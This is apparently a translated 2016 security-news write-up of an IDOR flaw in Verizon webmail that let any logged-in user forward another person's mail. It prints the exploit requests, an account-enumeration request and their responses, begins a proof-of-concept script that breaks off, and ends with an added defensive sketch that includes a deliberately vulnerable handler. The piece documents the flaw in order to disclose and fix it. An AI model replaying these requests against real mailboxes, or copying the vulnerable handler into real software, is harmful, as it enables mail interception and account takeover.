Bizarre vulnerability found in Verizon mailbox: personal mail can be forwarded to any mailbox

2016-06-18T00:00:00
ID MYHACK58:62201676031
Type myhack58
Reporter Anonymous
Modified 2016-06-18T00:00:00

Description

Verizon is one of America's big three telecommunications giants. A Verizon security employee recently found a high-risk vulnerability in the Verizon mailbox system that allows any Verizon mailbox user's mail to be forwarded to an arbitrary other mailbox account.

The screenshot below shows an interface provided by the Verizon mailbox. Its function is to let users forward the messages their Verizon mailbox receives to another mailbox account: a message is sent to a Verizon mailbox, and the Verizon mailbox then pushes that email to the other mailbox the user has configured.

[Screenshot: Verizon mailbox setup interface]

The security researcher first started a local proxy and began capturing traffic. He first simulated a normal user operation, setting up a forwarding mailbox, and captured the request that was sent. In the captured request below we can see that it is a perfectly ordinary POST, but the userID parameter may be subject to an IDOR (Insecure Direct Object References) vulnerability, because referencing the object directly like this is very unsafe.

```
POST https://mail.verizon.com/webmail/driver?nimlet=ispemailsettings&method=addForward HTTP/1.1
Host: mail.verizon.com
Connection: keep-alive
Content-Length: 169
Pragma: no-cache
Cache-Control: no-cache
Origin: https://mail.verizon.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: https://mail.verizon.com/webmail/driver?nimlet=showmessages&view=emails
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: REMOVED

sourceID=&auth=&auditID=&serviceName=MPSMail&userID=vzeREMOVED%40verizon.net&forwardAddress=REMOVED%2Bverizon%40gm
```

The response that came back:

```json
{
  "res": {
    "Response": {
      "DataOut": {
        "User": {
          "ID": "vzeREMOVED",
          "ForwardAddress": "REMOVED+verizon@gmail.com"
        }
      },
      "xsi:noNamespaceSchemaLocation": "",
      "xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
      "Errors": {
        "Error": {
          "Description": "",
          "Severity": "Success",
          "Type": "",
          "Number": "0"
        }
      },
      "Control": {
        "Source": {
          "ID": "",
          "Auth": "",
          "AuditID": ""
        },
        "Service": {
          "Name": "MPSMail",
          "Action": "AddForward"
        }
      }
    }
  }
}
```

Most Verizon employee mailboxes, such as the customer service and sales mailboxes, are published on the Internet, and Verizon also exposes an API for checking which mailboxes are registered. The request below lets an attacker enumerate most Verizon mailbox accounts.

```
Host: mail.verizon.com
Connection: keep-alive
Content-Length: 28
Pragma: no-cache
Cache-Control: no-cache
Origin: https://mail.verizon.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: https://mail.verizon.com/webmail/driver?nimlet=showmessages&view=emails
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: REMOVED

&alias=REMOVED@verizon.net
```

The response:

```json
{
  "res": [
    {
      "alias": "REMOVED@verizon.net",
      "mailID": "vzeREMOVED@verizon.net"
    }
  ]
}
```

Suppose an attacker changes the userID parameter in the forwarding request to someone else's mailbox. From then on, mail that person receives is also pushed to the mailbox the attacker configured, such as Facebook password-change emails, banking emails, and so on. To draw attention to the issue inside Verizon, the employee also wrote a Python script to demonstrate the harm.

```python
import urllib
import requests
from Cookie import SimpleCookie

"""
A valid webmail login is required.
Login to https://mail.verizon.com/ and paste in your Cookie header
"""
cookie_str = 'REMOVED'
```
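The IDOR described above comes down to the server taking the target mailbox from the `userID` form field instead of from the authenticated session. The following is an added example, not code from the original article or from Verizon: a hypothetical handler in the vulnerable shape next to a hardened one, where the session table, addresses and function names are all constructed for illustration.

```python
# Added example: server-side ownership check for a forwarding-settings handler.
# SESSIONS, Forbidden and the add_forward_* functions are hypothetical names.
from urllib.parse import parse_qs

# Constructed sample state: session token -> mailbox the session authenticated as.
SESSIONS = {"tok-alice": "alice@example.net", "tok-bob": "bob@example.net"}


class Forbidden(Exception):
    """Raised when a request is unauthenticated or names a mailbox it does not own."""


def add_forward_vulnerable(forwards, token, body):
    """Shape of the flaw: any logged-in session may name any mailbox in userID."""
    if token not in SESSIONS:
        raise Forbidden("not logged in")
    form = parse_qs(body)
    user_id = form["userID"][0]          # client-controlled object reference
    forwards[user_id] = form["forwardAddress"][0]
    return user_id


def add_forward_hardened(forwards, token, body, audit):
    """Take the mailbox from the session; log and reject a mismatching userID."""
    owner = SESSIONS.get(token)
    if owner is None:
        raise Forbidden("not logged in")
    form = parse_qs(body)
    claimed = form.get("userID", [owner])[0]
    if claimed.strip().lower() != owner.lower():
        # A mismatch is a detection signal worth alerting on, not just an error.
        audit.append({"event": "idor_attempt",
                      "session_user": owner, "claimed": claimed})
        raise Forbidden("userID does not match authenticated mailbox")
    forwards[owner] = form["forwardAddress"][0]   # write keyed by session owner
    return owner
```

The audit entries written on a mismatch give the operations team a record of which session asked to change which mailbox.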
